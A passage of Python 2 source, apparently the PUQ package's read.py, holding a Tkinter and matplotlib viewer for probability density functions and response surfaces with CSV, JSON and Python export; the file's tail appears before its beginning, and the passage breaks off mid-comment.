filetypes=filetypes) if not filename: return if ext == 'csv': with open(filename, 'wb') as csvfile: spamwriter = csv.writer(csvfile) for x, prob in np.column_stack((self.pdf.x, self.pdf.y)): spamwriter.writerow([x, prob]) m = "Wrote %s pairs of (value, probability) data to '%s'.\n" % (len(self.pdf.x), filename) t = Toplevel(self.parent) t.title("Wrote CSV File") msg = Message(t, text=m, width=500) button = Button(t, text="OK", command=t.destroy) button.pack(side=BOTTOM) msg.pack(fill=BOTH, expand=1) elif ext == 'py': with open(filename, 'wb') as pyfile: pyfile.write(repr(self.pdf)) elif ext == 'json': with open(filename, 'wb') as jfile: jfile.write(pickle(self.pdf)) def min_changed(self, newmin): if newmin != '': newmin = float(newmin) if newmin != self.min: self.changed(min=newmin) def max_changed(self, newmax): if newmax != '': newmax = float(newmax) if newmax != self.max: self.changed(max=newmax) class PdfFrameComplex(PdfFrame): def __init__(self, parent, obj, plotframe, nb=None, color=None, desc=None): #print "PdfFrameComplex Init" self.plotframe = plotframe self.a = plotframe.get_plot() self.nb = nb if nb: self.tnum = color color = self.get_color(color) bframe = Frame(parent) lframe = Frame(bframe) rframe = Frame(bframe) self.show = IntVar(value=1) self.bars = IntVar(value=0) cframe = LabelFrame(bframe) # add color selector and show to details if nb: if desc: tframe = Frame(bframe) Label(tframe, text=desc, font=Font(weight="bold")).pack(side=TOP, fill=BOTH, expand=1) c1 = Checkbutton(cframe, variable=self.show, command=self.cb, pady=5, text='Show') c1.pack(fill=BOTH, expand=1) ToolTip(c1, follow_mouse=1, text='Show Plot') img = sq_image(color) self.clab = Label(cframe, image=img) self.clab.photo = img self.clab.bind("<Button-1>", self.popup) self.clab.pack(fill=BOTH, expand=1) ToolTip(self.clab, follow_mouse=1, text='Select Plot Color') c2 = Checkbutton(cframe, variable=self.bars, command=self.cb, pady=5, text='Bars') c2.pack(fill=BOTH, expand=1) ToolTip(c2, 
follow_mouse=1, text='Show Histogram Bars') cp = ColorPop(self.clab, callback=self.color_changed) if isinstance(obj, PDF): self.par = None self.pdf = obj else: self.pdf = obj.pdf self.par = obj self.data = self.pdf.data self.fit = False kde = gaussian_kde(self.data) bw = kde.factor self.bw = None iqr = scipy.stats.scoreatpercentile(self.data, 75) - scipy.stats.scoreatpercentile(self.data, 25) if iqr == 0.0: self.nbins=50 else: self.nbins = int((np.max(self.data) - np.min(self.data)) / (2*iqr/len(self.data)**(1.0/3)) + .5) self.nbins = max(2, self.nbins) self.min = None self.max = None pdf = self.pdf self.color = color if self.bars.get(): self.line1 = self.a.hist(self.data, self.nbins, normed=1, facecolor=self.color, alpha=0.2) if self.show.get(): self.line2, = self.a.plot(pdf.x, pdf.y, color=color, linewidth=3) # BOTTOM RIGHT - FIT FRAME fitframe = LabelFrame(rframe, text="FIT") RB(fitframe, ["Gaussian", "Linear"], val=self.fit, callback=self.fit_changed) # Bandwidth frame bwframe = LabelFrame(fitframe, text='Bandwidth', padx=5, pady=5) res = 10**round(math.log(bw/100.0, 10)) r1 = round(bw / 10.0) if r1 == 0.0: r1 += res r2 = round(bw * 10.0) self.bwscale = Scale(bwframe, from_=r1, to=r2, orient=HORIZONTAL, resolution=res, showvalue=0, command=self.bw_changed) self.bwscale.set(bw) self.bwscale.config(command=self.bw_changed) self.bwe = Entry(bwframe, width=5) self.bwe.bind('<Return>', self.bw_changed) self.bwe.pack(side=LEFT) self.bwscale.set(bw) self.bwe.delete(0, END) self.bwe.insert(0, "%.3g" % bw) self.bwscale.pack(fill=BOTH, expand=True, side=LEFT) # Bin frame binframe = LabelFrame(fitframe, text='Bins', padx=5, pady=5) self.binscale = Scale(binframe, from_=2, to=100, orient=HORIZONTAL, resolution=1, showvalue=0) self.binscale.set(self.nbins) self.binscale.config(command=self.bins_changed) self.bine = Entry(binframe, width=5) self.bine.bind('<Return>', self.bins_changed) self.bine.pack(side=LEFT) self.bine.delete(0, END) self.bine.insert(0, str(self.nbins)) 
self.binscale.pack(fill=BOTH, expand=True, side=LEFT) bwframe.pack(side=TOP, fill=BOTH, expand=True) binframe.pack(side=TOP, fill=BOTH, expand=True) self.bwscale.config(state='disabled') self.bwe.config(state='disabled') fitframe.pack(side=RIGHT, fill=BOTH, expand=1) # Bottom Left Frame fdata = LabelFrame(lframe, text='Raw Data', padx=5, pady=5) f1 = Frame(fdata) f2 = Frame(fdata) MyLabel(f1, "Mean", '%.3g' % np.mean(self.data)).frame.pack(side=LEFT, padx=5) MyLabel(f1, "Dev", '%.3g' % np.std(self.data)).frame.pack(side=LEFT, padx=5) MyLabel(f2, "Min", '%.3g' % np.min(self.data)).frame.pack(side=LEFT, padx=5) MyLabel(f2, "Max", '%.3g' % np.max(self.data)).frame.pack(side=LEFT, padx=5) fpdf = LabelFrame(lframe, text='Fitted PDF', padx=5, pady=5) f1.pack(side=TOP, pady = 5, padx = 10, fill=BOTH) f2.pack(side=TOP, pady = 5, padx = 10, fill=BOTH) f1 = Frame(fpdf) f2 = Frame(fpdf) self.entry_min = MyEntry(f2, "Min", StringVar(), '%.3g' % pdf.range[0], callback=self.min_changed) self.entry_max = MyEntry(f2, "Max", StringVar(), '%.3g' % pdf.range[1], callback=self.max_changed) self.label_mean = MyLabel(f1, "Mean", '%.3g' % pdf.mean) self.label_dev = MyLabel(f1, "Dev", '%.3g' % pdf.dev) self.label_mode = MyLabel(f1, "Mode", '%.3g' % pdf.mode) for lab in [self.label_mean, self.label_dev, self.label_mode]: lab.frame.pack(side=LEFT, padx=5) f1.pack(side=TOP, pady = 5, padx = 10, fill=BOTH) f2.pack(side=TOP, pady = 5, padx = 10, fill=BOTH) fdata.pack(side=TOP, fill=BOTH) fpdf.pack(side=TOP, fill=BOTH) if nb and desc: tframe.pack(side=TOP, fill=BOTH, expand=0) cframe.pack(side=LEFT, fill=BOTH, expand=0) lframe.pack(side=LEFT, fill=BOTH, expand=1) rframe.pack(side=RIGHT, fill=BOTH, expand=1) bframe.pack(side=TOP, fill=BOTH, expand=1) def changed(self, fit=None, min=None, max=None, nbins=None, bw=None): #print 'PDF CHANGED %s %s %s %s %s' % (fit, min, max, nbins, bw) if fit != None: self.fit = fit self.binscale.config(state='normal') self.bine.config(state='normal') if self.fit 
== 'Linear': state = 'disabled' else: state = 'normal' self.bwscale.config(state=state) self.bwe.config(state=state) if min != None: if min == '': self.min = None else: self.min = min if max != None: if max == '': self.max = None else: self.max = max if nbins != None: self.nbins = nbins if bw != None: self.bw = bw if fit != None or bw != None or (self.fit == 'Linear' and nbins != None): self.pdf = ExperimentalPDF(self.data, fit=self.fit, nbins=self.nbins, bw=self.bw, min=self.min, max=self.max, force=1) try: self.line2.remove() except: pass try: for patch in self.line1[2]: patch.remove() except: pass self.a.relim() if self.bars.get(): self.line1 = self.a.hist(self.data, self.nbins, normed=1, facecolor=self.color, alpha=0.2) if self.show.get(): self.line2, = self.a.plot(self.pdf.x, self.pdf.y, self.color, linewidth=3) self.plotframe.update() self.entry_min.update('%.3g' % self.pdf.range[0]) self.entry_max.update('%.3g' % self.pdf.range[1]) self.label_mean.update('%.3g' % self.pdf.mean) self.label_dev.update('%.3g' % self.pdf.dev) self.label_mode.update('%.3g' % self.pdf.mode) def bins_changed(self, val): if isinstance(val, Event): val = int(self.bine.get()) else: val = int(val) if val != self.nbins: #print "bins_changed", val self.bine.delete(0, END) self.bine.insert(0, str(val)) self.changed(nbins=val) def bw_changed(self, val): if isinstance(val, Event): val = self.bwe.get() try: val = float(val) except: if val != 'silverman': val = None kde = gaussian_kde(self.data, bw_method=val) val = kde.factor self.bwscale.set(val) else: val = float(val) if val != self.bw: #print "BW changed from %s to %s" % (self.bw, val) if self.bw == None: self.bw = val else: self.bwe.delete(0, END) self.bwe.insert(0, "%.3g" % val) self.changed(bw=val) def fit_changed(self, val): if val != self.fit: self.changed(fit=val) def cb(self): self.changed() def color_changed(self, color): self.color = color self.changed() if self.nb: self.nb.tab(self.tnum,image=sq_image(color)) 
self.clab.config(image=sq_image(color)) def popup(self, event): print 'popup' self.menu.post(event.x_root, event.y_root) class ColorPop: def __init__(self, parent, callback): self.callback = callback # create a popup menu self.aMenu = Menu(root, tearoff=0) for color in sq_colors: self.aMenu.add_command(image=sq_image(color), command=lambda c=color: self.callback(c)) # attach popup to frame parent.bind("<Button-1>", self.popup) def popup(self, event): self.aMenu.post(event.x_root, event.y_root) class PdfFrameSimple(PdfFrame): def __init__(self, parent, obj, plotframe, nb=None, color=None, desc=None): #print "PdfFrameSimple Init" self.plotframe = plotframe self.a = plotframe.get_plot() self.nb = nb if nb: self.tnum = color color = self.get_color(color) bframe = Frame(parent) lframe = Frame(bframe, bd=1) rframe = Frame(bframe) self.show = IntVar(value=1) if nb: if desc: tframe = Frame(bframe) Label(tframe, text=desc, font=Font(weight="bold")).pack(fill=X, expand=1) tframe.pack(side=TOP, fill=X, expand=0) c = Checkbutton(lframe, variable=self.show, command=self.cb) c.pack() tool1 = ToolTip(c, follow_mouse=1, text='Show Plot') img = sq_image(color) self.clab = Label(lframe, text=' ', image=img) self.clab.photo = img self.clab.bind("<Button-1>", self.popup) cp = ColorPop(self.clab, callback=self.color_changed) tool2 = ToolTip(self.clab, follow_mouse=1, text='Select Plot Color') self.clab.pack(fill=X, expand=1) if isinstance(obj, PDF): self.par = None self.pdf = obj else: self.par = obj self.pdf = obj.pdf self.min = None self.max = None self.pdf_orig = self.pdf self.color = color self.line2, = self.a.plot(self.pdf.x, self.pdf.y, color=self.color, linewidth=3) # BOTTOM RIGHT frame3 = Frame(rframe) if self.par: frame1 = Frame(rframe) MyLabel(frame1, 'Type', self.par.__class__.__name__, bg='white').frame.pack(side=LEFT, padx=5) self.mean = MyLabel(frame3, "Mean", '%.3g' % self.pdf.mean) self.dev = MyLabel(frame3, "Dev", '%.3g' % self.pdf.dev) self.mode = MyLabel(frame3, 
"Mode", '%.3g' % self.pdf.mode) for lab in [self.mean, self.dev, self.mode]: lab.frame.pack(side=LEFT, padx=5) self.entry_min = MyEntry(frame3, "Min", StringVar(), '%.3g' % self.pdf.range[0], callback=self.min_changed) self.entry_max = MyEntry(frame3, "Max", StringVar(), '%.3g' % self.pdf.range[1], callback=self.max_changed) if self.par: frame1.pack(side=TOP, anchor='nw', fill=BOTH, expand=1) frame3.pack(side=BOTTOM, anchor='nw', fill=BOTH, expand=1) lframe.pack(side=LEFT, fill=X, expand=0) rframe.pack(side=RIGHT, fill=X, expand=1) bframe.pack(side=TOP, fill=X, expand=0) def cb(self): self.changed() def color_changed(self, color): self.color = color self.changed() if self.nb: self.nb.tab(self.tnum,image=sq_image(color)) self.clab.config(image=sq_image(color)) def popup(self, event): self.menu.post(event.x_root, event.y_root) def changed(self, min=None, max=None): #print 'Parameter Changed %s %s' % (min, max) if min != None: if min == '': self.min = None self.pdf = self.pdf_orig else: self.min = min nsamp = options['pdf']['numpart'] x = np.linspace(min, self.pdf.range[1], nsamp) y = np.interp(x, self.pdf_orig.x, self.pdf_orig.y) self.pdf = PDF(x, y) if max != None: if max == '': self.max = None self.pdf = self.pdf_orig else: self.max = max nsamp = options['pdf']['numpart'] x = np.linspace(self.pdf.range[0], max, nsamp) y = np.interp(x, self.pdf_orig.x, self.pdf_orig.y) self.pdf = PDF(x, y) self.mean.update('%.3g' % self.pdf.mean) self.dev.update('%.3g' % self.pdf.dev) self.mode.update('%.3g' % self.pdf.mode) self.entry_min.update('%.3g' % self.pdf.range[0]) self.entry_max.update('%.3g' % self.pdf.range[1]) try: self.line2.remove() except: pass self.a.relim() if self.show.get(): self.line2, = self.a.plot(self.pdf.x, self.pdf.y, color=self.color, linewidth=3) self.plotframe.update() class TimeFrame: def __init__(self, parent): self.tframe = Frame(parent) TimeFrame.me = weakref.proxy(self) def cleanup(self): try: self.tframe.pack_forget() 
self.canvas._tkcanvas.pack_forget() del self.canvas del self.f except: pass def plot(self, ext): from tkFileDialog import asksaveasfilename filename = asksaveasfilename(title="Plot to file...", initialfile='%s-response' % self.name, defaultextension='.%s' % ext, filetypes=[(ext.upper(), '*.%s' % ext)]) if not filename: return self.canvas.print_figure(filename) def state(self, st, val, path): self.cleanup() if st != 'RESPONSE': return self.name = os.path.basename(path[:-9]) self.f = plt.figure(figsize=(5, 5)) self.canvas = FigureCanvasTkAgg(self.f, master=self.tframe) self.canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1) self.tframe.pack(side=TOP, fill=BOTH, expand=1) self.canvas._tkcanvas.pack(side='top', fill='both', expand=1) if len(val.params) > 2: ax = Axes3D(self.f, azim=30.0, elev=30.0) ax.text2D(0.5, 0.5,'Cannot plot response functions\nwith more than 2 parameters', horizontalalignment='center', verticalalignment='center', transform = ax.transAxes) elif len(val.params) == 2: labels = CB.get('Labels') ax = Axes3D(self.f, azim=30.0, elev=30.0) val.plot(ax=ax, fig=self.f, title=0, labels=labels) else: self.a = self.f.add_subplot(111) self.a.grid(True) val.plot(fig=self.a) class SurFrame: def __init__(self, parent): self.parent = parent def cleanup(self): try: self.surframe.pack_forget() except: pass def rbf_changed(self, rbfunc): global modified #print "rbf changed to ", rbfunc #print self.val.rbf self.val.rbf = rbfunc del h5[self.path] h5[self.path] = pickle(self.val) # invalidate the pdf pdfpath = self.path[:-len('response')] + 'pdf' samplepath = self.path[:-len('response')] + 'samples' varname = self.path.split('/')[-2] if pdfpath in h5: del h5[pdfpath] if samplepath in h5: del h5[samplepath] # change treeview pdf tag to 'generate' for child in MyApp.app.tree.get_children('psweep'): item = MyApp.app.tree.item(child) if item['text'] == varname: for ch in MyApp.app.tree.get_children(child): item = MyApp.app.tree.item(ch) if item['text'] == 'pdf': 
MyApp.app.tree.item(ch, tags = ['generate']) modified = True MyApp.state_changed('RESPONSE', self.val, self.path) def state(self, st, val, path): self.cleanup() if st != 'RESPONSE': return if isinstance(val, SampledFunc): self.val = val self.surframe = LabelFrame(self.parent, text="Radial Basis Function") rbfvals = [ "multiquadric", "linear", "cubic", "quintic", "inverse", "gaussian" ] self.rbf = MyCombobox(self.surframe, 'RBF', rbfvals, current=val.rbf, callback=self.rbf_changed) else: self.surframe = LabelFrame(self.parent, text="Surface") # Surface Pane self.eqn = ScrolledText.ScrolledText(self.surframe, height=2, ) self.eqn.insert(END, val.eqn) self.eqn.pack(side=TOP, expand=YES, fill=BOTH, padx=5, pady=5) # RMSE rmsep = val.rmse()[1] if rmsep > 10: bgcolor = 'red' elif rmsep > 5: bgcolor = 'orange' elif rmsep > 2: bgcolor = 'yellow' else: bgcolor = '' self.rmse = MyLabel(self.surframe, value='%.3g%%' % rmsep, text='RMSE', bg=bgcolor) self.rmse.frame.pack(side=TOP, anchor='w', padx=5, pady=5) self.surframe.pack(side=LEFT, fill=BOTH, expand=1) class ParFrame: def __init__(self, parent): self.parent = parent def cleanup(self): try: self.parframe.pack_forget() except: pass def state(self, st, val, path): self.cleanup() if st != 'RESPONSE': return self.parframe = Frame(self.parent) self.parframe.pack(side=LEFT, fill=BOTH, expand=1) # Parameters Table with scrollbar scrollbar = Scrollbar(self.parframe) scrollbar.pack(side=RIGHT, fill=Y) t=ttk.Treeview(self.parframe, yscrollcommand=scrollbar.set, height=len(val.params)) t["columns"]=("desc","pdf") t.column("#0", width=75) t.column("desc", width=100) t.column("pdf", width=400) t.heading("#0", text='Name') t.heading("#1", text='Description') t.heading("#2", text='PDF') for p in val.params: cname = p.__class__.__name__[:-9] pdf_str = '%s [%s - %s] mean=%s dev=%s mode=%s' % (cname, p.pdf.range[0], p.pdf.range[1], p.pdf.mean, p.pdf.dev, p.pdf.mode) t.insert("", "end", text=p.name, values=[p.description, pdf_str]) 
t.tag_configure("ttk") scrollbar.config(command=t.yview) t.pack(side=TOP, fill=BOTH, expand=YES) class MyApp: def __init__(self, parent, objlist): self.parent = parent parent.protocol('WM_DELETE_WINDOW', self.quit) # contains everything self.container = Frame(self.parent) self.container.pack(fill=BOTH, expand=YES) # top frame self.tframe = Frame(self.container) self.bframe = Frame(self.container) detailframe = None plotframe = PlotFrame(self.tframe) if isinstance(objlist, list): cnote = CNote(self.bframe) for cnum, obj in enumerate(objlist): f = Frame(cnote) PdfFactory(f, obj[0], plotframe, nb=cnote, color=cnum, desc=obj[2]) cnote.add(f, color=cnum, text=obj[1], padding=3) cnote.pack(expand=1, fill=BOTH) else: detailframe = PdfFactory(self.bframe, objlist[0], plotframe) MB(parent, plotframe, detailframe) self.tframe.pack(side=TOP, fill=BOTH, expand=YES) self.bframe.pack(side=LEFT, fill=BOTH, expand=YES) def quit(self): global windows wdw = self.parent if wdw in windows: windows.remove(wdw) if not windows: wdw.quit() wdw.destroy() def show_obj(objlist, compare=0): global root, windows root = Tk() root.withdraw() windows = [] if compare: win = Toplevel() windows.append(win) win.title('PUQ Compare') MyApp(win, objlist) else: for i, obj in enumerate(objlist): win = Toplevel() windows.append(win) try: win.title(namelist[i]) except: win.title(obj[2]) MyApp(win, obj) root.mainloop() # loads python file # returns list [(obj, name, desc), (obj, name, desc), ...] 
def python_load(fname): sys.path = [os.getcwd()] + sys.path module = os.path.splitext(os.path.split(fname)[1])[0] _temp = __import__(module, globals(), locals(), [], 0) pdflist = [] for name, obj in _temp.__dict__.iteritems(): if isinstance(obj, Parameter): desc = obj.description if desc == name: desc = '' pdflist.append((obj, name, "%s: %s (%s)" % (fname, name, desc))) elif isinstance(obj, PDF): pdflist.append((obj, name, "%s: %s" % (fname, name))) if 'run' in _temp.__dict__: def extract_params(uq,b,c): for pm in uq.params: if pm.description and pm.description != pm.name: pdflist.append((pm, pm.name, ('%s: %s (%s)' % (fname, pm.name, pm.description)))) else: pdflist.append((pm, pm.name, ('%s: %s' % (fname, pm.name)))) _temp.Sweep = extract_params _temp.run() if len(pdflist) == 0: print 'Error: Found no PDFs or Parameters in %s' % fname sys.exit(1) if len(pdflist) == 1: return pdflist while 1: print '\nList PDFs you want displayed, separated by commas.' print '\nFound the following PDFs:' for i, p in enumerate(pdflist): print "%d: %s" % (i, p[1]) num = raw_input("Which one(s) to display? (* for all) ") try: if num == '*': numlist = pdflist else: numlist = map(int, num.split(',')) numlist = [pdflist[x] for x in numlist] break except: print 'Invalid number. Try again.\n' return numlist def get_name_desc(obj, loc): if isinstance(obj, Parameter): name = obj.name desc = obj.description else: name = os.path.splitext(loc)[0] desc = '' return name, desc # returns list [(obj, name, desc), (obj, name, desc), ...] def read_obj(loc): name = None desc = None if loc.startswith('http'): try: obj = NetObj(loc) name, desc = get_name_desc(obj, loc) return [(obj, name, desc)] except: print "Error accessing", loc return [] else: extension = loc.split('.')[-1] if extension == 'json': f = open(loc, 'r') obj = unpickle(f.read()) f.close() name, desc = get_name_desc(obj, loc) return [(obj, name, desc)] elif extension == 'py': return python_load(loc) print "Don't know how to open %s." 
% loc return [] def read(*args): opt, args = parse_args(list(args)) objlist = [] for arg in args: objs = read_obj(arg) objlist.extend(objs) if objlist: show_obj(objlist, compare=opt.c) def parse_args(args): debug(args) usage = "Usage: puq read [options] [object] ...\n\ where 'object' is a URI, python file, or JSON file\n\ Options:\n\ -c Compare. When two or more objects are given, display them in the same plot.\n\ " parser = OptionParser(usage) parser.add_option("-c", action="store_true", help="Compare plots.") (opt, ar) = parser.parse_args(args=args) return opt, ar if __name__ == "__main__": read(*sys.argv[1:])
puq/read.py
import matplotlib matplotlib.use('TkAgg', warn=False) import scipy import numpy as np from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg from matplotlib.figure import Figure from mpl_toolkits.mplot3d import Axes3D from matplotlib import cm import matplotlib.pyplot as plt from Tkinter import * from tkFont import Font import ttk import ScrolledText import sys, os, weakref, copy from urlparse import urlparse, urlunsplit import h5py from puq import Parameter, PDF, ExperimentalPDF, options, pickle, unpickle, NetObj, gaussian_kde, SampledFunc import math import webbrowser, shutil, atexit, shelve import logging from logging import info, debug, exception, warning, critical from optparse import OptionParser from cnote import CNote, sq_colors, sq_image from tooltip import ToolTip class MyCombobox: def __init__(self, parent, txt, values, current, callback=None): self.var = StringVar() self.var.set(current) self.callback = callback self.cb = ttk.Combobox(parent, textvariable=self.var, values=values) self.cb.bind('<<ComboboxSelected>>', self.changed) self.cb.pack(side=TOP, padx=5, pady=5, anchor='w') def changed(self, event): #print "combobox changed to %s" % (self.var.get()) if self.callback: self.callback(self.var.get()) def state(self, st, path): self.cb.config(state=st) class MyLabel: def __init__(self, parent, text, value, bg=''): self.frame = Frame(parent, background='black', bd=1) if bg: self.label = Label(self.frame, text=value, bg=bg) else: self.label = Label(self.frame, text=value) self.desc = Label(self.frame, text=text) self.desc.pack(side=LEFT, anchor='w') self.label.pack(side=LEFT, anchor='w') def update(self, val): self.label.config(text=val) # radiobutton class RB: RB_list= [] def __init__(self, parent, values, val, callback=None): self.callback = callback RB.RB_list.append(weakref.proxy(self)) self.var = StringVar() self.var.set(val) for txt in values: b = Radiobutton(parent, text=txt, variable=self.var, value=txt, command=self.changed) 
b.pack(side=TOP, padx=5, pady=5, anchor='w') def changed(self): #print "RB changed to %s" % (self.var.get()) if self.callback: self.callback(self.var.get()) else: MyApp.state_changed() def state(self, st): self.cb.config(state=st) @staticmethod def get(name): for n in RB.RB_list: if name == n.txt: return n.var.get() class MyEntry: def __init__(self, parent, txt, var, val, callback=None): self.callback = callback self.var = var self.var.set(val) Label(parent, text=txt).pack(side=LEFT) self.entry = Entry(parent, textvariable=self.var, width=10) self.entry.bind('<Return>', self.changed) self.entry.pack(side=LEFT, padx=5, anchor='w') def changed(self, entry): #print "Entry changed to %s" % (self.var.get()) if self.callback: self.callback(self.var.get()) else: MyApp.state_changed() def state(self, st): self.cb.config(state=st) def update(self, val): self.var.set(val) class MB: def __init__(self, parent, plotframe, dframe): menubar = Menu(parent) parent['menu'] = menubar filemenu = Menu(menubar, tearoff=0) menubar.add_cascade(label="File", menu=filemenu) #filemenu.add_command(label="Upload", command=ask_upload) #filemenu.add_separator() #filemenu.add_command(label="Preferences", command=preferences) #filemenu.add_separator() filemenu.add_command(label="Quit", command=root.quit) self.exportmenu = Menu(menubar, tearoff=0) menubar.add_cascade(label="Export", menu=self.exportmenu) if dframe == None: self.exportmenu.add_command(label="Copy PDF to Clipboard", state=DISABLED) self.exportmenu.add_command(label="Export PDF as JSON", state=DISABLED) self.exportmenu.add_command(label="Export PDF to CSV file", state=DISABLED) else: self.exportmenu.add_command(label="Copy PDF to Clipboard", command=dframe.copy_clip, state=NORMAL) self.exportmenu.add_command(label="Export PDF as JSON", command=lambda: dframe.export_pdf('json'), state=NORMAL) self.exportmenu.add_command(label="Export PDF to CSV file", command=lambda: dframe.export_pdf('csv'), state=NORMAL) self.exportplot = 
Menu(self.exportmenu, tearoff=0) self.exportmenu.add_cascade(label="Plot to", menu=self.exportplot) fig = plt.figure() sup = fig.canvas.get_supported_filetypes() keys = sup.keys() keys.sort() for key in keys: lab = '%s : %s' % (key.upper(), sup[key]) self.exportplot.add_command(label=lab, command = lambda key=key: plotframe.plot(key)) helpmenu = Menu(menubar, tearoff=0) helpmenu.add_command(label="About", command=self.about) helpmenu.add_command(label="Online Help", command=self.open_help) menubar.add_cascade(label="Help", menu=helpmenu) parent.config(menu=menubar) def open_help(self): webbrowser.open('http://memshub.org/site/memosa_docs/puq/index.html') def about(self): from tkMessageBox import showinfo showinfo(message=__doc__, title='ABOUT') class ResponseFrame: def __init__(self, parent): self.tframe = Frame(parent) ResponseFrame.me = weakref.proxy(self) def cleanup(self): try: self.tframe.pack_forget() self.canvas._tkcanvas.pack_forget() del self.canvas del self.f except: pass def plot(self, ext): from tkFileDialog import asksaveasfilename filename = asksaveasfilename(title="Plot to file...", initialfile='%s-response' % self.name, defaultextension='.%s' % ext, filetypes=[(ext.upper(), '*.%s' % ext)]) if not filename: return self.canvas.print_figure(filename) def state(self, st, val, path): self.cleanup() if st != 'RESPONSE': return self.name = os.path.basename(path[:-9]) self.f = plt.figure(figsize=(5, 5)) self.canvas = FigureCanvasTkAgg(self.f, master=self.tframe) self.canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1) self.tframe.pack(side=TOP, fill=BOTH, expand=1) self.canvas._tkcanvas.pack(side='top', fill='both', expand=1) if len(val.params) > 2: ax = Axes3D(self.f, azim=30.0, elev=30.0) ax.text2D(0.5, 0.5,'Cannot plot response functions\nwith more than 2 parameters', horizontalalignment='center', verticalalignment='center', transform = ax.transAxes) elif len(val.params) == 2: labels = CB.get('Labels') ax = Axes3D(self.f, azim=30.0, elev=30.0) 
val.plot(ax=ax, fig=self.f, title=0, labels=labels) else: self.a = self.f.add_subplot(111) self.a.grid(True) val.plot(fig=self.a) class PlotFrame: def __init__(self, parent): self.parent = parent # TOP FRAME - CANVAS self.f = plt.figure(figsize=(5, 5)) self.a = self.f.add_subplot(111) self.a.grid(True) #self.a.set_xlabel(self.description) self.a.set_ylabel("Probability") self.canvas = FigureCanvasTkAgg(self.f, master=parent) self.canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1) self.canvas._tkcanvas.pack(side='top', fill='both', expand=1) def update(self): self.canvas.draw() def get_plot(self): return self.a def plot(self, ext): from tkFileDialog import asksaveasfilename name = 'puq-plot' filename = asksaveasfilename(title="Plot to file...", initialfile=name, defaultextension='.%s' % ext, filetypes=[(ext.upper(), '*.%s' % ext)]) if not filename: return self.canvas.print_figure(filename) def PdfFactory(frame, obj, plotframe, nb=None, color=None, desc=None): state = None if isinstance(obj, PDF): if hasattr(obj, 'data'): state = 'PDF' else: state = 'PDF2' elif isinstance(obj, Parameter): if hasattr(obj.pdf, 'data'): state = 'PDF' else: state = 'PDF2' if state == 'PDF': return PdfFrameComplex(frame, obj, plotframe, nb=nb, color=color, desc=desc) if state == 'PDF2': return PdfFrameSimple(frame, obj, plotframe, nb=nb, color=color, desc=desc) print 'FACTORY RETURNING NONE' return None class PdfFrame: def get_color(self, color): if color == None: color = 'blue' elif isinstance(color, int): color = sq_colors[color] return color def copy_clip(self): root.clipboard_clear() root.clipboard_append(pickle(self.pdf)) def export_pdf(self, ext): # Dump pdf as csv, json, or python import csv from tkFileDialog import asksaveasfilename if self.par: name = '%s-pdf' % self.par.name else: name = 'PDF' extension = '.'+ext filetypes = [(ext.upper(), '*.%s' % ext)] filename = asksaveasfilename(title="Save PDF to CSV file...", initialfile=name, defaultextension=extension, 
filetypes=filetypes) if not filename: return if ext == 'csv': with open(filename, 'wb') as csvfile: spamwriter = csv.writer(csvfile) for x, prob in np.column_stack((self.pdf.x, self.pdf.y)): spamwriter.writerow([x, prob]) m = "Wrote %s pairs of (value, probability) data to '%s'.\n" % (len(self.pdf.x), filename) t = Toplevel(self.parent) t.title("Wrote CSV File") msg = Message(t, text=m, width=500) button = Button(t, text="OK", command=t.destroy) button.pack(side=BOTTOM) msg.pack(fill=BOTH, expand=1) elif ext == 'py': with open(filename, 'wb') as pyfile: pyfile.write(repr(self.pdf)) elif ext == 'json': with open(filename, 'wb') as jfile: jfile.write(pickle(self.pdf)) def min_changed(self, newmin): if newmin != '': newmin = float(newmin) if newmin != self.min: self.changed(min=newmin) def max_changed(self, newmax): if newmax != '': newmax = float(newmax) if newmax != self.max: self.changed(max=newmax) class PdfFrameComplex(PdfFrame): def __init__(self, parent, obj, plotframe, nb=None, color=None, desc=None): #print "PdfFrameComplex Init" self.plotframe = plotframe self.a = plotframe.get_plot() self.nb = nb if nb: self.tnum = color color = self.get_color(color) bframe = Frame(parent) lframe = Frame(bframe) rframe = Frame(bframe) self.show = IntVar(value=1) self.bars = IntVar(value=0) cframe = LabelFrame(bframe) # add color selector and show to details if nb: if desc: tframe = Frame(bframe) Label(tframe, text=desc, font=Font(weight="bold")).pack(side=TOP, fill=BOTH, expand=1) c1 = Checkbutton(cframe, variable=self.show, command=self.cb, pady=5, text='Show') c1.pack(fill=BOTH, expand=1) ToolTip(c1, follow_mouse=1, text='Show Plot') img = sq_image(color) self.clab = Label(cframe, image=img) self.clab.photo = img self.clab.bind("<Button-1>", self.popup) self.clab.pack(fill=BOTH, expand=1) ToolTip(self.clab, follow_mouse=1, text='Select Plot Color') c2 = Checkbutton(cframe, variable=self.bars, command=self.cb, pady=5, text='Bars') c2.pack(fill=BOTH, expand=1) ToolTip(c2, 
follow_mouse=1, text='Show Histogram Bars') cp = ColorPop(self.clab, callback=self.color_changed) if isinstance(obj, PDF): self.par = None self.pdf = obj else: self.pdf = obj.pdf self.par = obj self.data = self.pdf.data self.fit = False kde = gaussian_kde(self.data) bw = kde.factor self.bw = None iqr = scipy.stats.scoreatpercentile(self.data, 75) - scipy.stats.scoreatpercentile(self.data, 25) if iqr == 0.0: self.nbins=50 else: self.nbins = int((np.max(self.data) - np.min(self.data)) / (2*iqr/len(self.data)**(1.0/3)) + .5) self.nbins = max(2, self.nbins) self.min = None self.max = None pdf = self.pdf self.color = color if self.bars.get(): self.line1 = self.a.hist(self.data, self.nbins, normed=1, facecolor=self.color, alpha=0.2) if self.show.get(): self.line2, = self.a.plot(pdf.x, pdf.y, color=color, linewidth=3) # BOTTOM RIGHT - FIT FRAME fitframe = LabelFrame(rframe, text="FIT") RB(fitframe, ["Gaussian", "Linear"], val=self.fit, callback=self.fit_changed) # Bandwidth frame bwframe = LabelFrame(fitframe, text='Bandwidth', padx=5, pady=5) res = 10**round(math.log(bw/100.0, 10)) r1 = round(bw / 10.0) if r1 == 0.0: r1 += res r2 = round(bw * 10.0) self.bwscale = Scale(bwframe, from_=r1, to=r2, orient=HORIZONTAL, resolution=res, showvalue=0, command=self.bw_changed) self.bwscale.set(bw) self.bwscale.config(command=self.bw_changed) self.bwe = Entry(bwframe, width=5) self.bwe.bind('<Return>', self.bw_changed) self.bwe.pack(side=LEFT) self.bwscale.set(bw) self.bwe.delete(0, END) self.bwe.insert(0, "%.3g" % bw) self.bwscale.pack(fill=BOTH, expand=True, side=LEFT) # 